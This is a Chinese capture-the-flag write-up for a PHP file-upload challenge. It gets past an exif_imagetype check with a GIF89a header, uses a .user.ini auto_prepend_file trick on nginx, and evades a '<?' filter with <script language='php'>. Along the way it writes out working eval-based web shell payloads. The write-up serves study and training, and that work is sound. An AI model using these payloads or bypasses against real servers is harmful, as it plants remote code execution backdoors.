0x00
打开web如下,可以看到这是一道上传的题
新建一个文件命名为3.php,进行上传,得到如下结果
发现被过滤了,进行模糊测试,发现php相关拓展名的都已被过滤掉,但是上传其他类型文件时显示不为jpg类型文件(如下),可以知道使用的是exif_imagetype函数{通过文件幻数(文件头)来判断文件类型}进行判断
通过谷歌的插件,发现该站点使用的是nginx
所以使用.htaccess绕过行不通,因为它是Apache的配置文件
这里我们采用.user.ini来绕过--》.user.ini
绕过exif_imagetype函数的检查,我们可以通过添加jpg文件的文件头(GIF89a)
创建文件.user.ini内容如下
GIF89a
auto_prepend_file=01.jpg
## auto_prepend_file将01.jpg文件的内容添加到当前目录下的php文件的开头
上传得到结果如下
我们继续创建01.jpg文件内容如下
GIF89a
<?php @eval($_POST['pass']);?>
上传得到结果如下,发现对内容也进行了过滤,过滤了<?
我们可以使用如下来绕过
GIF89a
<script language="php"> @eval($_POST['pass']);</script>
重新上传,得到结果
我们直接访问上传后地址的index.php,可以看到01.jpg中的内容已经被包含
使用蚁剑进行连接,连接成功
获取flag
0x01 总结
主要考察了如下几点:
- 1.exif_imagetype函数绕过
exif_imagetype函数通过检查文件幻数(文件头)来判断是不是jpg格式文件
- 2.
.user.ini上传绕过的使用
参数文章:.user.ini
- 3.内容过滤
<?绕过
<?php @eval($_POST['pass']); ?>
## 替换为如下
<script language="php">@eval($_POST['pass']);</script>